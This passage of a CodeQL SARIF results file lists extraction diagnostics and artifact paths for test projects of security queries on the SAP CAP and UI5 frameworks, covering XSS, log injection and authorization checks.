"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - } 
- } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - } ], - "executionSuccessful" : true - } ], - "artifacts" : [ { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - }, { - "location" : { - "uri" : ".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - }, { - "location" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - }, { - "location" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - }, { - "location" : { - "uri" : 
".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - }, { - "location" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - }, { - "location" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - }, { - "location" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - }, { 
- "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 28 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 44 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 48 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 50 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : 
"%SRCROOT%", - "index" : 53 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 59 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - }, { - "location" : { 
- "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 81 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - }, { - 
"location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 119 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - }, { - "location" : { - 
"uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" 
